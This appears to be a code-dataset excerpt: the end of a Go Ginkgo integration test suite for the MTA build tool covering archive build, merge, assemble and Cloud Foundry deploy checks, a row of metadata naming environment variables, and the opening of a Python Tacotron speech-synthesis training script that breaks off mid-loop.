It("MBT build for mta_demo", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "build -p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the MTAR was generated
validateMtaArchiveContents([]string{"node/", "node/data.zip", "node-js/", "node-js/data.zip"}, filepath.Join(path, "mta_archives", "mta_demo_0.0.1.mtar"))
})
It("MBT build - wrong platform", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, _, err := execute(bin, "build -p=xxx", path)
Ω(err).Should(HaveOccurred())
})
It("MBT build with timeout", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "moduletimeout")
bin := filepath.FromSlash(binPath)
start := time.Now()
out, errOut, err := execute(bin, "build", path)
elapsed := time.Since(start)
Ω(err).Should(HaveOccurred())
Ω(out + errOut).Should(ContainSubstring("timed out"))
// Check elapsed time
Ω(elapsed).Should(BeNumerically(">=", time.Duration(5)*time.Second))
Ω(elapsed).Should(BeNumerically("<=", time.Duration(10)*time.Second))
})
})
It("Generate MTAR - unsupported platform, module removed from mtad", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
_, errOut, err := execute(bin, "-f Makefile.mta p=neo mtar=xyz", path)
Ω(err).Should(Succeed(), errOut)
mtarFilename := filepath.Join(dir, "testdata", "mta_demo", "mta_archives", "xyz.mtar")
Ω(mtarFilename).Should(BeAnExistingFile())
// check that module with unsupported platform 'neo' is not presented in mtad.yaml
mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3.1"
ID: mta_demo
version: 0.0.1
modules:
- name: node-js
type: nodejs
path: node-js
provides:
- name: node-js_api
properties:
url: ${default-url}
parameters:
name: nodejs
parameters:
hcp-deployer-version: 1.1.0
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
})
It("Generate MTAR for mta_demo", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
_, errOut, err := execute(bin, "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the archive was generated
mtarFilename := filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName)
Ω(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName)).Should(BeAnExistingFile())
// check that module with unsupported platform 'cf' is presented in mtad.yaml
mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3.1"
ID: mta_demo
version: 0.0.1
modules:
- name: node
type: javascript.nodejs
path: node
provides:
- name: node_api
properties:
url: ${default-url}
- name: node-js
type: javascript.nodejs
path: node-js
provides:
- name: node-js_api
properties:
url: ${default-url}
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
validateMtaArchiveContents([]string{"node/", "node/data.zip", "node-js/", "node-js/data.zip"}, filepath.Join(path, "mta_archives", "mta_demo_0.0.1.mtar"))
})
//It("Generate MTAR for mta_java", func() {
//
// dir, _ := os.Getwd()
// path := dir + filepath.FromSlash("/testdata/mta_java")
// bin := filepath.FromSlash("make")
// _, errOut, err, _ := execute(bin, "-f Makefile.mta p=cf", path)
// Ω(err).Should(Succeed(), errOut)
// // Check the archive was generated
// mtarFilename := filepath.Join(dir, "testdata", "mta_java", "mta_archives", javaArchiveName)
// Ω(filepath.Join(dir, "testdata", "mta_java", "mta_archives", javaArchiveName)).Should(BeAnExistingFile())
// // check that module with unsupported platform 'cf' is presented in mtad.yaml
// mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
// Ω(e).Should(Succeed())
// actual, e := mta.Unmarshal(mtadContent)
// Ω(e).Should(Succeed())
// expected, e := mta.Unmarshal([]byte(`
// _schema-version: 2.0.0
// ID: com.fetcher.project
// version: 0.0.1
// modules:
// - name: myModule
// type: java.tomcat
// path: myModule
// requires:
// - name: otracker-uaa
// - name: otracker-managed-hdi
// parameters:
// buildpack: sap_java_buildpack
// stack: cflinuxfs3
// resources:
// - name: otracker-uaa
// type: com.sap.xs.uaa-space
// parameters:
// config-path: xs-security.json
// - name: otracker-managed-hdi
// type: com.sap.xs.managed-hdi-container
// `))
// Ω(e).Should(Succeed())
// Ω(actual).Should(Equal(expected))
// validateMtaArchiveContents([]string{"myModule/", "myModule/java-xsahaa-1.1.2.war"}, filepath.Join(path, "mta_archives", "com.fetcher.project_0.0.1.mtar"))
//})
When("Running MBT commands with MTA extension descriptors", func() {
var path string
var mtarFilename string
var makefileName string
BeforeEach(func() {
dir, err := os.Getwd()
Ω(err).Should(Succeed())
path = filepath.Join(dir, "testdata", "mta_demo")
mtarFilename = filepath.Join(path, "mta_archives", demoArchiveName)
makefileName = filepath.Join(path, "Makefile.mta")
})
AfterEach(func() {
Ω(os.RemoveAll(makefileName)).Should(Succeed())
Ω(os.RemoveAll(mtarFilename)).Should(Succeed())
})
var validateMtar = func() {
// Check the MTAR was generated without the node-js module (since the extension file overrides its supported-platforms)
Ω(mtarFilename).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{"node/", "node/data.zip"}, mtarFilename)
// Check the mtad.yaml has the parts from the extension file
// check that module with unsupported platform 'neo' is not present in the mtad.yaml
mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3.1"
ID: mta_demo
version: 0.0.1
modules:
- name: node
type: javascript.nodejs
path: node
provides:
- name: node_api
properties:
url: ${default-url}
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
}
It("MBT build for mta_demo with extension", func() {
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "build -e=ext.mtaext -p=cf", path)
Ω(err).Should(Succeed(), errOut)
validateMtar()
})
It("MBT init and run make for mta_demo with extension - non-verbose", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -e=ext.mtaext", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Read the MakeFile was generated
Ω(makefileName).Should(BeAnExistingFile())
// generate mtar
_, errOut, err = execute("make", "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
validateMtar()
})
It("MBT init and run make for mta_demo with extension - verbose", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -m=verbose -e=ext.mtaext", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Read the MakeFile was generated
Ω(makefileName).Should(BeAnExistingFile())
// generate mtar
_, errOut, err = execute("make", "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
validateMtar()
})
})
})
var _ = Describe("Generate the Verbose Makefile and use it for mtar generation", func() {
It("Generate Verbose Makefile", func() {
dir, _ := os.Getwd()
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", "Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName))).Should(Succeed())
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -m=verbose", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Read the MakeFile was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "Makefile.mta")).Should(BeAnExistingFile())
// generate mtar
bin = filepath.FromSlash("make")
_, errOut, err = execute(bin, "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the archive was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName)).Should(BeAnExistingFile())
})
Describe("module with dependencies", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "moduledep")
archivePath := filepath.Join(path, "mta_archives", "f1_0.0.1.mtar")
tempZipPath := filepath.Join(path, "mta_archives", "data.zip")
AfterEach(func() {
Ω(os.RemoveAll(filepath.Join(path, "Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client2"))).Should(Succeed())
})
It("Generate Verbose Makefile with module dependencies", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -m=verbose", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Check the MakeFile was generated
Ω(filepath.Join(path, "Makefile.mta")).Should(BeAnExistingFile())
// Generate mtar
bin = filepath.FromSlash("make")
_, errOut, err = execute(bin, "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the archive was generated
Ω(archivePath).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{"module_with_dep/", "module_with_dep/data.zip"}, archivePath)
// Extract data.zip and check its content
err = extractFileFromZip(archivePath, "module_with_dep/data.zip", tempZipPath)
Ω(err).Should(Succeed())
validateArchiveContents([]string{"package.json", "client/", "client/client_package.json", "client2/", "client2/client_package.json"}, tempZipPath)
})
})
})
Describe("module with dependencies", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "moduledep")
archivePath := filepath.Join(path, "mta_archives", "f1_0.0.1.mtar")
tempZipPath := filepath.Join(path, "mta_archives", "data.zip")
AfterEach(func() {
Ω(os.RemoveAll(filepath.Join(path, "mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client2"))).Should(Succeed())
})
DescribeTable("Build MTA with module dependencies", func(additionalBuildOpts []string) {
bin := filepath.FromSlash(binPath)
cmdOut, _, err := executeWithArgs(bin, path, append([]string{"build"}, additionalBuildOpts...)...)
Ω(err).Should(Succeed())
Ω(cmdOut).ShouldNot(BeNil())
// Check the archive was generated
Ω(archivePath).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{"module_with_dep/", "module_with_dep/data.zip"}, archivePath)
// Extract data.zip and check its content
err = extractFileFromZip(archivePath, "module_with_dep/data.zip", tempZipPath)
Ω(err).Should(Succeed())
validateArchiveContents([]string{"package.json", "client/", "client/client_package.json", "client2/", "client2/client_package.json"}, tempZipPath)
},
Entry("Non-verbose build", []string{}),
Entry("Parallel verbose build", []string{"--mode=verbose"}),
Entry("Serial verbose build", []string{"--mode=verbose", "--jobs=1"}),
)
})
var _ = Describe("MBT gen commands", func() {
It("Generate mtad", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node"), os.ModePerm)).Should(Succeed())
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node-js"), os.ModePerm)).Should(Succeed())
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "mtad-gen", path)
Ω(err).Should(Succeed(), errOut)
mtadPath := filepath.Join(path, "mtad.yaml")
Ω(mtadPath).Should(BeAnExistingFile())
content, _ := ioutil.ReadFile(mtadPath)
mtadObj, _ := mta.Unmarshal(content)
Ω(len(mtadObj.Modules)).Should(Equal(2))
Ω(mtadObj.Modules[0].Type).Should(Equal("javascript.nodejs"))
Ω(mtadObj.Modules[1].Type).Should(Equal("javascript.nodejs"))
})
It("Generate mtad with mta extension", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node"), os.ModePerm)).Should(Succeed())
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node-js"), os.ModePerm)).Should(Succeed())
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, `mtad-gen -e="ext.mtaext"`, path)
Ω(err).Should(Succeed(), errOut)
mtadPath := filepath.Join(path, "mtad.yaml")
Ω(mtadPath).Should(BeAnExistingFile())
content, _ := ioutil.ReadFile(mtadPath)
mtadObj, _ := mta.Unmarshal(content)
Ω(len(mtadObj.Modules)).Should(Equal(1))
Ω(mtadObj.Modules[0].Name).Should(Equal("node"))
Ω(mtadObj.Modules[0].Type).Should(Equal("javascript.nodejs"))
})
})
var _ = Describe("Deploy basic mta archive", func() {
AfterEach(func() {
resourceCleanup("node")
resourceCleanup("node-js")
})
It("Deploy MTAR", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo/mta_archives")
bin := filepath.FromSlash("cf")
// Execute deployment process with output to make the deployment success/failure more clear
err := executeWithOutput(bin, "deploy "+demoArchiveName+" -f", path)
Ω(err).Should(Succeed())
// Check if the deploy succeeded by using curl command response.
// Receiving the output status code 200 represents successful deployment
args := "-s -o /dev/null -w '%{http_code}' " + os.Getenv("NODE_APP_ROUTE")
path = dir + filepath.FromSlash("/testdata/mta_demo")
bin = filepath.FromSlash("curl")
cmdOut, errOut, err := executeEverySecond(bin, args, path)
if len(errOut) > 0 {
log.Println(errOut)
}
Ω(err).Should(Succeed())
Ω(cmdOut).Should(Equal("'200'"))
})
})
var _ = Describe("Generate merged mta.yaml", func() {
AfterEach(func() {
dir, _ := os.Getwd()
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", "result.yaml"))).Should(Succeed())
})
It("merges with one extension", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, `merge -e=ext.mtaext -n=result.yaml`, path)
Ω(err).Should(Succeed(), errOut)
mtadPath := filepath.Join(path, "result.yaml")
Ω(mtadPath).Should(BeAnExistingFile())
content, _ := ioutil.ReadFile(mtadPath)
mtaObj, _ := mta.Unmarshal(content)
expected, e := mta.Unmarshal([]byte(`
ID: mta_demo
_schema-version: '2.1'
version: 0.0.1
modules:
- name: node
type: nodejs
path: node
provides:
- name: node_api
properties:
url: ${default-url}
build-parameters:
supported-platforms: [cf]
- name: node-js
type: nodejs
path: node-js
provides:
- name: node-js_api
properties:
url: ${default-url}
build-parameters:
builder: zip
supported-platforms: [neo]
`))
Ω(e).Should(Succeed())
Ω(mtaObj).Should(Equal(expected))
})
})
var _ = Describe("Assemble MTAR", func() {
var currentWorkingDirectory string
var mtaAssemblePath string
var resultMtarPath string
BeforeEach(func() {
currentWorkingDirectory, _ = os.Getwd()
mtaAssemblePath = currentWorkingDirectory + filepath.FromSlash("/testdata/mta_assemble")
resultMtarPath = filepath.Join(mtaAssemblePath, "mta_archives", "mta.assembly.example_1.3.3.mtar")
})
AfterEach(func() {
Ω(os.RemoveAll(filepath.Join(mtaAssemblePath, "mta.assembly.example.mtar"))).Should(Succeed())
Ω(os.Chdir(currentWorkingDirectory)).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_assemble/mta_archives"))).Should(Succeed())
})
It("Assemble MTAR", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "assemble", mtaAssemblePath)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
Ω(cmdOut).Should(ContainSubstring("assembling the MTA project..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("copying the MTA content..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("generating the metadata..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("generating the MTA archive..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("the MTA archive generated at: " + resultMtarPath + "\n"))
Ω(cmdOut).Should(ContainSubstring("cleaning temporary files..." + "\n"))
Ω(resultMtarPath).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{
"node.zip", "xs-security.json",
"node/", "node/.eslintrc", "node/.eslintrc.ext", "node/.gitignore", "node/.npmrc", "node/jest.json", "node/package.json", "node/runTest.js", "node/server.js",
"node/.che/", "node/.che/project.json",
"node/tests/", "node/tests/sample-spec.js",
}, resultMtarPath)
})
It("Assemble MTAR with MTA extension", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, fmt.Sprintf(`assemble -e="my.mtaext"`), mtaAssemblePath)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(Equal(""))
Ω(resultMtarPath).Should(BeAnExistingFile())
// TODO the assemble command copies the contents of excluded modules to the archive (unrelated to the extension files) even though
// the modules are removed from the mtad.yaml and manifest.mf
validateMtaArchiveContents([]string{
"node.zip", "xs-security.json",
"node/", "node/.eslintrc", "node/.eslintrc.ext", "node/.gitignore", "node/.npmrc", "node/jest.json", "node/package.json", "node/runTest.js", "node/server.js",
"node/.che/", "node/.che/project.json",
"node/tests/", "node/tests/sample-spec.js",
}, resultMtarPath)
mtadContent, e := getFileContentFromZip(resultMtarPath, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3"
ID: mta.assembly.example
version: 1.3.3
modules:
- name: example2
type: javascript.nodejs
path: node.zip
provides:
- name: backend
properties:
url: "${default-url}"
requires:
- name: assembly-uaa
resources:
- name: mta-assembly-uaa
type: org.cloudfoundry.managed-service
parameters:
service: xsuaa
service-plan: space
path: xs-security.json
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
})
})
})
func getFileContentFromZip(path string, filename string) ([]byte, error) {
zipFile, err := zip.OpenReader(path)
if err != nil {
return nil, err
}
defer zipFile.Close()
for _, file := range zipFile.File {
if strings.Contains(file.Name, filename) {
fc, err := file.Open()
if err != nil {
return nil, err
}
defer fc.Close() // If we got here there won't be another loop iteration
return ioutil.ReadAll(fc)
}
}
return nil, fmt.Errorf(`file "%s" not found`, filename)
}
func extractFileFromZip(archivePath string, filename string, dst string) error {
zipFile, err := zip.OpenReader(archivePath)
if err != nil {
return err
}
defer func() {
_ = zipFile.Close()
}()
var fileToExtract *zip.File = nil
for _, file := range zipFile.File {
if strings.Contains(file.Name, filename) {
fileToExtract = file
}
}
if fileToExtract == nil {
return fmt.Errorf(`file "%s" not found`, filename)
}
in, err := fileToExtract.Open()
if err != nil {
return err
}
defer func() {
_ = in.Close()
}()
err = dir.WriteFile(in, dst)
return err
}
func validateMtaArchiveContents(expectedAdditionalFilesInArchive []string, archiveLocation string) {
expectedFilesInArchive := append(expectedAdditionalFilesInArchive, "META-INF/", "META-INF/MANIFEST.MF", "META-INF/mtad.yaml")
validateArchiveContents(expectedFilesInArchive, archiveLocation)
}
func validateArchiveContents(expectedFilesInArchive []string, archiveLocation string) {
archive, err := zip.OpenReader(archiveLocation)
Ω(err).Should(Succeed())
defer func() {
_ = archive.Close()
}()
var filesInArchive []string
for _, file := range archive.File {
filesInArchive = append(filesInArchive, file.Name)
}
for _, expectedFile := range expectedFilesInArchive {
Ω(contains(expectedFile, filesInArchive)).Should(BeTrue(), fmt.Sprintf("expected %s to be in the archive; archive contains %v", expectedFile, filesInArchive))
}
for _, existingFile := range filesInArchive {
Ω(contains(existingFile, expectedFilesInArchive)).Should(BeTrue(), fmt.Sprintf("did not expect %s to be in the archive; archive contains %v", existingFile, filesInArchive))
}
}
func contains(element string, elements []string) bool {
for _, el := range elements {
if el == element {
return true
}
}
return false
}
// execute with live output
func executeWithOutput(bin string, args string, path string) error {
cmd := exec.Command(bin, strings.Split(args, " ")...)
cmd.Dir = path
cmdReader, err := cmd.StdoutPipe()
if err != nil {
return errors.Wrapf(err, "Error creating StdoutPipe for Cmd")
}
cmdErrReader, err := cmd.StderrPipe()
if err != nil {
return errors.Wrapf(err, "Error creating StderrPipe for Cmd")
}
scanner := bufio.NewScanner(cmdReader)
scannerErr := bufio.NewScanner(cmdErrReader)
go func() {
for scanner.Scan() {
fmt.Printf("process output | %s\n", scanner.Text())
}
}()
go func() {
for scannerErr.Scan() {
fmt.Printf("process error output | %s\n", scannerErr.Text())
}
}()
err = cmd.Start()
if err != nil {
return errors.Wrapf(err, "Error starting Cmd")
}
err = cmd.Wait()
if err != nil {
return errors.Wrapf(err, "Error waiting for Cmd")
}
return nil
}
// Delete deployed app
func resourceCleanup(appName string) {
wd, _ := os.Getwd()
path := wd + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("cf")
cmdOut, cmdErr, err := execute(bin, "delete "+appName+" -r -f", path)
Ω(err).Should(Succeed(), cmdErr)
Ω(cmdOut).ShouldNot(BeEmpty())
}
// Execute command every second for 40 times
func executeEverySecond(bin string, args string, path string) (string, errorOut string, err error) {
n := 0
cmdOut, errOut, err := execute(bin, args, path)
for range time.Tick(time.Second) {
if n == 40 || strings.Compare(cmdOut, "'200'") == 0 {
break
}
cmdOut, errOut, err = execute(bin, args, path)
n++
}
return cmdOut, errOut, err
}
// Execute commands and get outputs
func execute(bin string, args string, path string) (output string, errorOutput string, err error) {
return executeWithArgs(bin, path, strings.Split(args, " ")...)
}
func executeWithArgs(bin string, path string, args ...string) (output string, errorOutput string, err error) {
// Provide list of commands
cmd := exec.Command(bin, args...)
// bin path
cmd.Dir = path
// std out
stdoutBuf := &bytes.Buffer{}
cmd.Stdout = stdoutBuf
// std error
stdErrBuf := &bytes.Buffer{}
cmd.Stderr = stdErrBuf
// Start command
if err = cmd.Start(); err != nil {
return "", "", err
}
// wait to the command to finish
err = cmd.Wait()
return stdoutBuf.String(), stdErrBuf.String(), err
}
|
[
"\"GOPATH\"",
"\"NODE_APP_ROUTE\""
] |
[] |
[
"GOPATH",
"NODE_APP_ROUTE"
] |
[]
|
["GOPATH", "NODE_APP_ROUTE"]
|
go
| 2 | 0 | |
train_tacotron.py
|
# coding: utf-8
import os
import time
import math
import argparse
import traceback
import subprocess
import numpy as np
from jamo import h2j
import tensorflow as tf
from datetime import datetime
from functools import partial
from hparams import hparams, hparams_debug_string
from tacotron import create_model, get_most_recent_checkpoint
from utils import ValueWindow, prepare_dirs
from utils import infolog, warning, plot, load_hparams
from utils import get_git_revision_hash, get_git_diff, str2bool, parallel_run
from utils.audio import save_wav, inv_spectrogram
from text import sequence_to_text, text_to_sequence
from datasets.datafeeder_tacotron import DataFeederTacotron, _prepare_inputs
import os
os.environ["CUDA_VISIBLE_DEVICES"]="0"
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
log = infolog.log
def create_batch_inputs_from_texts(texts):
sequences = [text_to_sequence(text) for text in texts]
inputs = _prepare_inputs(sequences)
input_lengths = np.asarray([len(x) for x in inputs], dtype=np.int32)
for idx, (seq, text) in enumerate(zip(inputs, texts)):
recovered_text = sequence_to_text(seq, skip_eos_and_pad=True)
if recovered_text != h2j(text):
log(" [{}] {}".format(idx, text))
log(" [{}] {}".format(idx, recovered_text))
log("="*30)
return inputs, input_lengths
def get_git_commit():
subprocess.check_output(['git', 'diff-index', '--quiet', 'HEAD']) # Verify client is clean
commit = subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode().strip()[:10]
log('Git commit: %s' % commit)
return commit
def add_stats(model, model2=None, scope_name='train'):
with tf.variable_scope(scope_name) as scope:
summaries = [
tf.summary.scalar('loss_mel', model.mel_loss),
tf.summary.scalar('loss_linear', model.linear_loss),
tf.summary.scalar('loss', model.loss_without_coeff),
]
if scope_name == 'train':
gradient_norms = [tf.norm(grad) for grad in model.gradients if grad is not None]
summaries.extend([
tf.summary.scalar('learning_rate', model.learning_rate),
tf.summary.scalar('max_gradient_norm', tf.reduce_max(gradient_norms)),
])
if model2 is not None:
with tf.variable_scope('gap_test-train') as scope:
summaries.extend([
tf.summary.scalar('loss_mel',
model.mel_loss - model2.mel_loss),
tf.summary.scalar('loss_linear',
model.linear_loss - model2.linear_loss),
tf.summary.scalar('loss',
model.loss_without_coeff - model2.loss_without_coeff),
])
return tf.summary.merge(summaries)
def save_and_plot_fn(args, log_dir, step, loss, prefix):
idx, (seq, spec, align) = args
audio_path = os.path.join(log_dir, '{}-step-{:09d}-audio{:03d}.wav'.format(prefix, step, idx))
align_path = os.path.join(log_dir, '{}-step-{:09d}-align{:03d}.png'.format(prefix, step, idx))
waveform = inv_spectrogram(spec.T,hparams)
save_wav(waveform, audio_path,hparams.sample_rate)
info_text = 'step={:d}, loss={:.5f}'.format(step, loss)
if 'korean_cleaners' in [x.strip() for x in hparams.cleaners.split(',')]:
log('Training korean : Use jamo')
plot.plot_alignment( align, align_path, info=info_text, text=sequence_to_text(seq,skip_eos_and_pad=True, combine_jamo=True), isKorean=True)
else:
log('Training non-korean : X use jamo')
plot.plot_alignment(align, align_path, info=info_text,text=sequence_to_text(seq,skip_eos_and_pad=True, combine_jamo=False), isKorean=False)
def save_and_plot(sequences, spectrograms,alignments, log_dir, step, loss, prefix):
fn = partial(save_and_plot_fn,log_dir=log_dir, step=step, loss=loss, prefix=prefix)
items = list(enumerate(zip(sequences, spectrograms, alignments)))
parallel_run(fn, items, parallel=False)
log('Test finished for step {}.'.format(step))
def train(log_dir, config):
config.data_paths = config.data_paths # ['datasets/moon']
data_dirs = config.data_paths # ['datasets/moon\\data']
num_speakers = len(data_dirs)
config.num_test = config.num_test_per_speaker * num_speakers # 2*1
if num_speakers > 1 and hparams.model_type not in ["deepvoice", "simple"]:
raise Exception("[!] Unkown model_type for multi-speaker: {}".format(config.model_type))
commit = get_git_commit() if config.git else 'None'
checkpoint_path = os.path.join(log_dir, 'model.ckpt') # 'logdir-tacotron\\moon_2018-08-28_13-06-42\\model.ckpt'
#log(' [*] git recv-parse HEAD:\n%s' % get_git_revision_hash()) # hccho: 주석 처리
log('='*50)
#log(' [*] dit diff:\n%s' % get_git_diff())
log('='*50)
log(' [*] Checkpoint path: %s' % checkpoint_path)
log(' [*] Loading training data from: %s' % data_dirs)
log(' [*] Using model: %s' % config.model_dir) # 'logdir-tacotron\\moon_2018-08-28_13-06-42'
log(hparams_debug_string())
# Set up DataFeeder:
coord = tf.train.Coordinator()
with tf.variable_scope('datafeeder') as scope:
# DataFeeder의 6개 placeholder: train_feeder.inputs, train_feeder.input_lengths, train_feeder.loss_coeff, train_feeder.mel_targets, train_feeder.linear_targets, train_feeder.speaker_id
train_feeder = DataFeederTacotron(coord, data_dirs, hparams, config, 32,data_type='train', batch_size=config.batch_size)
test_feeder = DataFeederTacotron(coord, data_dirs, hparams, config, 8, data_type='test', batch_size=config.num_test)
# Set up model:
is_randomly_initialized = config.initialize_path is None
global_step = tf.Variable(0, name='global_step', trainable=False)
with tf.variable_scope('model') as scope:
model = create_model(hparams)
model.initialize(train_feeder.inputs, train_feeder.input_lengths,num_speakers, train_feeder.speaker_id,train_feeder.mel_targets, train_feeder.linear_targets,
train_feeder.loss_coeff,is_randomly_initialized=is_randomly_initialized)
model.add_loss()
model.add_optimizer(global_step)
train_stats = add_stats(model, scope_name='stats') # legacy
with tf.variable_scope('model', reuse=True) as scope:
test_model = create_model(hparams)
test_model.initialize(test_feeder.inputs, test_feeder.input_lengths,num_speakers, test_feeder.speaker_id,test_feeder.mel_targets, test_feeder.linear_targets,
test_feeder.loss_coeff, rnn_decoder_test_mode=True,is_randomly_initialized=is_randomly_initialized)
test_model.add_loss()
test_stats = add_stats(test_model, model, scope_name='test')
test_stats = tf.summary.merge([test_stats, train_stats])
# Bookkeeping:
step = 0
time_window = ValueWindow(100)
loss_window = ValueWindow(100)
saver = tf.train.Saver(max_to_keep=None, keep_checkpoint_every_n_hours=2)
sess_config = tf.ConfigProto(log_device_placement=False,allow_soft_placement=True)
#sess_config.gpu_options.allow_growth=True
#sess_config = tf.ConfigProto(log_device_placement=True)
sess_config.gpu_options.allow_growth=True
# Train!
with tf.Session(config=sess_config) as sess:
#with tf.Session() as sess:
try:
summary_writer = tf.summary.FileWriter(log_dir, sess.graph)
sess.run(tf.global_variables_initializer())
if config.load_path:
# Restore from a checkpoint if the user requested it.
restore_path = get_most_recent_checkpoint(config.model_dir)
saver.restore(sess, restore_path)
log('Resuming from checkpoint: %s at commit: %s' % (restore_path, commit), slack=True)
elif config.initialize_path:
restore_path = get_most_recent_checkpoint(config.initialize_path)
saver.restore(sess, restore_path)
log('Initialized from checkpoint: %s at commit: %s' % (restore_path, commit), slack=True)
zero_step_assign = tf.assign(global_step, 0)
sess.run(zero_step_assign)
start_step = sess.run(global_step)
log('='*50)
log(' [*] Global step is reset to {}'.format(start_step))
log('='*50)
else:
log('Starting new training run at commit: %s' % commit, slack=True)
start_step = sess.run(global_step)
train_feeder.start_in_session(sess, start_step)
test_feeder.start_in_session(sess, start_step)
while not coord.should_stop():
start_time = time.time()
step, loss, opt = sess.run([global_step, model.loss_without_coeff, model.optimize], feed_dict=model.get_dummy_feed_dict())
time_window.append(time.time() - start_time)
loss_window.append(loss)
message = 'Step %-7d [%.03f sec/step, loss=%.05f, avg_loss=%.05f]' % (step, time_window.average, loss, loss_window.average)
log(message, slack=(step % config.checkpoint_interval == 0))
if loss > 100 or math.isnan(loss):
log('Loss exploded to %.05f at step %d!' % (loss, step), slack=True)
raise Exception('Loss Exploded')
if step % config.summary_interval == 0:
log('Writing summary at step: %d' % step)
feed_dict = {
**model.get_dummy_feed_dict(),
**test_model.get_dummy_feed_dict()
}
summary_writer.add_summary(sess.run( test_stats, feed_dict=feed_dict), step)
if step % config.checkpoint_interval == 0:
